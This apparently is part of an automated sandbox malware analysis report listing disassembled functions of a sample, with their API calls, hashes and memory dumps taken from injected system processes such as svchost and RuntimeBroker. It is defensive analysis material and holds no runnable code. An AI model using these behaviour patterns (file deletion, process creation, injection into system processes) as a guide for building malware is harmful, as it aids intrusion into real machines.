                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction ID: 3f90eb25eaba5dca63557f0aee667ca7c31998d0b46c408c811760b3e6b8fd4b
                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E4135714006689EDB22EF71CD48FAF77BDEF40709F4044ABAE85EA054DB749680CEA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C29DD Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 824 1c29dd-1c2a1a call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 834 1c2a20-1c2a43 call 1c2b4d call 1c34f7 824->834 838 1c2a48-1c2a4f 834->838 838->834 839 1c2a51-1c2a6d call 1c343f call 1c2683 838->839 844 1c2a6f 839->844 845 1c2a9a-1c2ab1 call 1c2683 839->845 844->845 847 1c2a71-1c2a86 call 1c26f9 844->847 850 1c2ade-1c2af5 call 1c2683 845->850 851 1c2ab3 845->851 847->845 855 1c2a88 847->855 860 1c2af8-1c2b11 call 1c2e97 850->860 861 1c2af7 850->861 851->850 853 1c2ab5-1c2aca call 1c26f9 851->853 853->850 862 1c2acc 853->862 855->845 856 1c2a8a-1c2a94 DeleteFileA 855->856 856->845 866 1c2b34-1c2b48 Sleep 860->866 867 1c2b13-1c2b1c call 1c3057 860->867 861->860 862->850 865 1c2ace-1c2ad8 DeleteFileA 862->865 865->850 866->838 867->866 870 1c2b1e-1c2b2e DeleteFileA 867->870 870->866
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                            • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                            • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction ID: d6b160bcfa924dc1f1ce780805323c99afb8a852cbc58ab7edcbb3794eecdb08
                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction Fuzzy Hash: 8D4130B15002289FDB22BB618D49FAF76BCEF60705F0444AEEA45E7041DB74DA80CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02412A38 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02412A2F), ref: 02412A3E
                                                                                                                                                                            • Part of subcall function 02412B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02412C68
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AB8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02412AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02412B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02412B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction ID: d5b34a25ca83654549debdb6c4af446f6cbf64038981b3b82e27acc5b618038e
                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction Fuzzy Hash: B53123715006689EDB22EF31CD48FAF76BDEF40709F4044ABAE45EA054DB749580CEA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C2A14 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                            • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 531250245-0
                                                                                                                                                                          • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
                                                                                                                                                                          • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                          • Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 024131EA Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0241320E
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 0241324C
                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,024131D9,00000011,?,00000000,00000000), ref: 02413279
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,024131D9,00000011,?,00000000,00000000,00000000,02413092,00000004,00000000), ref: 02413285
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,024131D9,00000011,?,00000000,00000000,00000000,02413092,00000004,00000000), ref: 02413291
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction ID: 479f6e983e7f99b8d0cbcb2b0fe015b63c032f0bebc601512d7cfd5ae0514e95
                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction Fuzzy Hash: 271124724005289FDF12AF60CC88B9FB7FDEF40705F01459AE985EA004DB745A80CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C31C6 Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3387338972-0
                                                                                                                                                                          • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
                                                                                                                                                                          • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                          • Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C0B65 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Window$ExitFindOpenThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 273847653-0
                                                                                                                                                                          • Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                          • Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
                                                                                                                                                                          • Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                          • Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02413F31 Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,02413F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02413F51
                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,02413F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02413F6F
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 02413F7F
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 02413F8F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1972126651.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_2410000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                          • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                          • Instruction ID: acc4a659522aac116112dbc9359ba58cefc6edd40eb1a3042a2206ca228f25c5
                                                                                                                                                                          • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF0F8705443509AFF403FB2884C74A3EB9AF0070CF0400DABA8AAD096CE7481948F65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001C3EC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1970966618.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                                                          • String ID: j
                                                                                                                                                                          • API String ID: 4133054770-2747090070
                                                                                                                                                                          • Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                          • Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
                                                                                                                                                                          • Opcode Fuzzy Hash: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00580811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2965526890.0000000000580000.00000040.00000001.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_580000_TextInputHost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: ad2bcb2392a4eecc8ec5ac587f61150cc7b45fc580965541663a43ffb8525291
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 8131C3720006056FEF417B709D4AABA7FACFF51310F001165BD85EA0E2EA7449A98BB6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 003D0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.2834831450.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_3d0000_RuntimeBroker.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 37606bd29bffd8747609349bc4e3a59d52761269dbb140b3fc6ccf4b2a91a728
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: DF31D4734102047FEB077B70AD46BBA3BACEF11700F000167BD95DE2A6EA7449649AB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00900811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000017.00000002.2834786421.0000000000900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_23_2_900000_RuntimeBroker.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 807355393fe14c1897a20badd90106663a8bf34a3f2784256eb9570d4bf43842
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A31E472000204AFEB017B709D86BBA3BACFF91300F444166FD85DA0E2EA7549A48AB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00181D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.2966200143.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction ID: f7edfa1d29ee3a2f15c71f23f1afa3dacc25a52c64f2328ccefa2793ada852ba
                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction Fuzzy Hash: 1121E531A34C1D0BEB58B27C9859764F6D6E79C320F980295E90DD36E4ED58CC8287C6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00180811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000018.00000002.2966200143.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 5f0a2bf08c062a83ee58e576ca9a39c726153a08bf7c3d9358f7d983c0235e19
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 7331B6724102087FEB427F709D46ABA376CEF26310F440165BD85DA0A6EB744BA9CFB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00190811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000001A.00000002.2966192849.0000000000190000.00000040.00000001.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_26_2_190000_RuntimeBroker.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 623531ca5508d48381e8169b3b0e04df07f96b68e4b13c9decdab74f5fa118bc
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: F131F772510205BFEF027F709D46ABA3BACEF25300F400565BD85DA0A2EB744DA4CBB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00011D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000001C.00000002.2966200483.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction ID: 9f39b5367da6598aeeb1998e776373a994835cae58933e0181d4283a84448e61
                                                                                                                                                                          • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                          • Instruction Fuzzy Hash: 6021F930B34C1D0BEB5CA27C98597A4F6E2E79C320F940295EA0DD36D4ED58CC8183C6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00010811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 11 10811-10846 call 1086e 14 10848-10851 11->14 15 108ad-108ae 11->15 16 10853-1085c 14->16 17 108af-108b0 14->17 15->17 18 108d0-108d7 call 108d9 16->18 19 1085e 16->19 28 108d9-1090f call 10cc4 call 114bc call 10643 call 10ce8 18->28 20 10860-10861 19->20 21 108c5-108cc 19->21 23 10863 20->23 24 108b9-108c2 call 11756 call 11e62 20->24 21->18 27 10866-1086f 23->27 23->28 24->21 31 10871-10897 27->31 32 1089e-108a4 27->32 45 10911-1091a call 11756 call 11e62 28->45 46 10939 call 1093e 28->46 31->32 32->15 51 1091f-10933 SleepEx RtlExitUserThread 45->51 51->46
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000001C.00000002.2966200483.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 6daea8f8473804d12748bca0b7204fc4a623126665c209879b0ad2024dc0075f
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 8231B6724142046FEB017BB09D4AAFA7BACEF11310F044165BDC5DA0A7DEB449D5CBB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 009F0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000001D.00000002.2966210621.00000000009F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_29_2_9f0000_svchost.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitSleepThreadUser
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3375650085-0
